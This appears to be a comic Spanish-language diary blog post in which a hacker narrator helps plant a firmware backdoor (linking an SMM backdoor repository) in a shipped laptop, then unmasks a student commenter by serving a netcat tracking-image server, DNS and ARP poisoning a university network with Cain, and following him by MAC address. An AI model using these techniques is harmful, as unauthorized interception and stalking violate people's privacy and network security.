- Bien niño, ahora, conecta el modificador de firmwares a la motherboard
- Si señor
- Si me vuelves a decir señor te meto un tiro en la cabeza
- Si señ... no señ... no vendetta
- Bien, carga el firmware
- ¿Cómo?
- ¿Qué?, ¿nunca has cargado un firmware?
- No señor, pero si me explica lo haré
- ¿Me ves cara de ingeniero?
- Si señor
- Pues no lo soy
- Lo siento señor
- Pues yo no sé cargar un firmware
- ¿Entonces?
- Hay que seguir la metodología
Habiendo resuelto el problema, Mauricio cerró la computadora y la reinició para verificar que todo estuviese bien.
Y estábamos listos.
- Que avanzado - dijo Faustino - ¿qué tan costoso es eso?
- ¿Qué?
- Eso
- ¡Ah! es gratis
- ¿Qué?
- Si, lo descargas de aquí: https://github.com/cr4sh/smmbackdoor
Faustino cerró la computadora y la llevó a la bodega para entregarla al día siguiente como un paquete más de DHL. Después de eso, todo sería cuestión de acción, de la mala.
Me fui al hotel a descansar, esperando lo que pasaría mañana. Pregunté como estaba Shellcode; y me dispuse a ver una película.
Me puse a ver FireFly, es como para la gente que le gusta la ciencia ficción.
Hasta que en algún punto me quedé dormido… y tuve un sueño raro… soñé a Carlos, a Lalo y Lalo 2… es un sueño terrible; que espero que por nuestro bien no sea una premonición.
Que miedo…
Intenté conciliar el sueño, pero no pude. Hasta que de pronto leí un mensaje… y respondí “lo siento, no va a funcionar unos días en Mexicali. Prometo arreglarlo pronto. Espero estes bien y no hayas salido corriendo por el temblor. Te amo, ¡muacks!”.
Me hice bolita y me quedé dormido… por cierto, hay caza recompensas que soy muy crueles. Yo no soy así… creo.
Querido Diario… ¿los perros pueden comer sushi?, Shellcode el otro día, mientras bajé a la cocina por agua, se comió todo el sushi que dejé en el escritorio; no se enfermó, pero no sé si eso está bien.
El día de hoy me encontraba realizado tareas altamente importantes, muy ocupado, sin poder si quiera tomar un café de lo atareado.
Cuando al parecer, cierta cachanilla intuyó que en realidad no estaba haciendo nada (cachanillas, todas son iguales).
- Bueno, me llama usted, entonces voy, Don Barredora es quién yo soy - respondí
- Hola terrorista cibernético
- ¿A qué debo el gran honor de su llamada? - si a trabajos me escribe, una llamada me levantó una gran intriga
- Necesito un favor, turbio... de esos que son tu especializada - OMG, no podía creer que había dicho eso.
Me quedé mudo por un momento, pensé y pensé que podía ser. La verdad era que me parecía sorprendente. Jamás habría esperado escuchar esas palabras, así que me preparé para la misión que fuese; no importaba lo compleja. Estaba listo.
- ¿Es en serio? - dije, con gran sorpresa
- Si - me dijo con voz de "baaaah"
- Dame un segundo, no te muevas... - corrí .... - ¡hey!, no te muevas
- Augus... ¡hey! - no le dejé terminar, mientras inmediatamente saqué mi teléfono y pensé en quién podría ser el mejor equipo para esta tarea
Si ella me pedía un favor turbio… ¡OMG!, de verdad tenía que ser muy turbio… ella no pediría esas cosas. Necesita lo mejor de lo mejor… era probable que fuese una de esas misiones en donde hay muertos, gente flotando en ríos de aguas negras, personas partidas a la mitad con coches que corren a sentidos contrarios, rusas violadoras y cosas de ese tipo.
Sin dudarlo, tenía que llamar a la persona más turbia que conozco.
- ¿Ahora que pasó? - respondió con pánico
- Joven, tenemos un problema
- ¡Adíos!, no es mi turno
- ¡Esperaaaaaaa!, esto es importante
- ¿Qué tan importante?
- Mom en persona me lo encargó - mentí
- Demonios... le tengo que avisar a Tania que puede que se vuelva a quedar viuda
- ¿Vuelva?
- Pues es que ya no sé cuantas veces me han estado a punto de matar
- Ahhh.. lo usual joven, lo usual
Estábamos listos… Ahora si, a averiguar que esa lo que pasaba.
- Listo
- ¿Qué hiciste?, ¿fuiste a baño?
- No u.u ... estaba preparando todo para la misión
- <<hahaha>> ... no es tan turbio
- Hum..¿no?, explícame
- Subieron un comentario feo en una página de Facebook. Al parecer un alumno de mi mamá, y quiere saber quién es
- ¿Es en serio? - dije, con acento cachanillo
- Si
- Ouuu... dame otro minuto
- Augu...
Y volví a marcar…
- Joven
- ¿Qué pasó joven?, ¿donde lo veo?, ¿cómo va a ser la intrusión?, ¿nos van a llevar en helicóptero?, ¿va a haber interrogatorio?, ¿nada más llevo lo básico?, ¿necesitamos algo más avanzado?, ¿granadas?, ¿bazucas?... ¿tafil?
- No, no, no... espera. Aborta la misión que siempre no
- Ohhh... así no se puede joven, ya no hay honor.
Casi al mismo tiempo me empezaron a reclamar con que me iban a cortar una pierna D:
- Listo
- ¿Qué tanto estas haciendo Augusto?
- Nada, nada... ¿qué pasó?
- Pues eso, sólo queremos saber quién hizo ese comentario. ¿Se puede?
- Si
- Bueno, cuando vuelvas entonces lo vemos
- Ahora mismo salgo para allá
- <<Hahaha>> no, cuando vengas
- Ya estoy en camino
- No es cierto, cuando vengas
- Es en serio, estoy saliendo al aeropuerto en este momento
- No te creo nada
- En tres horas veme a buscar al aeropuerto y allí estaré
- No te creo
- ¡De verdaaaaad!
La realidad es que de todas formas yo tenía que volver a casa, así que coincidió… pero, ella jamás lo averiguará 😛
Fui hacia el aeropuerto rumbo a Mexicali, y al llegar… pues si, no estaba allí. Es horrible, porque en Mexicali los taxistas de Uber no aceptan viajes con tarjeta de crédito; cosas raras cachanillas. Después de que me tardé horas muriendo de calor porque en la mañana había llovido, al fin un taxista me recogió. Llegué a casa y deje a Shellcode en casa con el aire acondicionado encendido a todo lo que daba. Y tome mi súper coche no gay para ir a verle.
Me estacioné abajo de su trabajo y empecé a aventar piedritas a la ventana… cosas chilangas que matan de risa a las cachanillas.
- ¡Augusto!, ¿qué haces aquí?
- Vengo a hackear un Facebook o algo así
- Te dije que no era urgente
- Te dije que ya venía en camino
- Bueno, vamos... hoy es el momento en que te perdoné mi mamá
- ¿Qué me perdoné?, pero si no hecho nada malo
- Eres chilango
- ¿Y eso qué?
- Seguro ya harás algo malo
- ¡Hey!
Bien, el asunto es que debíamos de encontrar a la persona que hizo los comentarios. Los cuales los estaba haciendo a horas laborales, lo cual me hizo pensar que tenía que hacerlos desde la escuela y además, lo estaba haciendo en una fan page, lo que lo hacía más fácil de tracear.
La verdad es que el asunto era sencillo, la señora da clases en una universidad muy chiquita llamada CETYS, que en un día arduo no tiene más de 200 alumnos conectados a mismo tiempo; así que iba a ser fácil encontrarle. Primero que nada, necesitaba obtener una dirección IP (como todo en la vida), hubiese utilizado un Apache montado en Kali, pero era el momento de ganar mi perdón; aunque aun no se exactamente porque debo de ganar mi perdón, y lucirme. Tenía que verme muy 1337 hax0r fux0r usando comandos en mi shell negra con letras verdes fluorecentes.
Monté un HTTP server usando netcat:
quesadilla:~ vendetta$ while true ; do echo -e "HTTP/1.1 200 OK\n\n $(date)" | nc -l -p 80 ; done
Entonces monté una imagen referenciada a mi y escribí un post en la fan page con un DNS poisoning hacia el gateway principal de la universidad. Y esperé…
Y esperé…
Y seguí esperando…
Y esperaaaaando….
y después de un <<shorro>> de horas, al fin cayó el tipo 😛
Ya tenía su dirección IP, además de que me di cuenta que toda la universidad estaba en el mismo segmento (¡Ufff… ojalá ESCOM hubiese estado así, ya me vería yo cambiándome las calificaciones). Así que con Cain saqué su MAC. ¿Por qué?, porque tienen DHCP en la red, así que podía ser que se cambiase la IP, y quería estar seguro de tenerlo.
Para eso sólo hay que activar el Sniffer, y luego ir a la pestaña de Network, click derecho y “Scan MAC Addresses” y nos mostrará todos los dispositivos conectados en nuestro mismo segmento. Y voilá
Ya tenía su MAC, ahora podía saber donde estaba en todo momento…
¡Nah!, en Mexicali nadie sabe cambiarse una MAC Address… no había de preocuparse. Lo siguiente era mantener un stalkeo constante del objetivo, y para eso le hice un ARP poisoning, también usando Cain.
Si, lo sé… HTTPS, pero; yo sólo necesitaba ubicarlo, ver en que repetidor estaba y ya.
Y listo, lo tenía… estaba en ese momento en la cafetería que esta junto al cajero.
- Señora, es él
- Hum..
- ¿Qué?
- Me lo debí imaginar
- No se preocupe, en la escuela me enseñaron a respetar a mis maestros, deme un segundito; ahorita vengo
- No, no, no... ven para acá chilanguito
- Pero...
- Shh...
- Pe...
- S...
- Grr...
- Gracias - en ese momento pensé que me habían perdonado, no sé de que, pero de algo - pero estuvo muy mal, eso no sé hace. Tenías que ser chilango
- ¡Ahhhh! D:
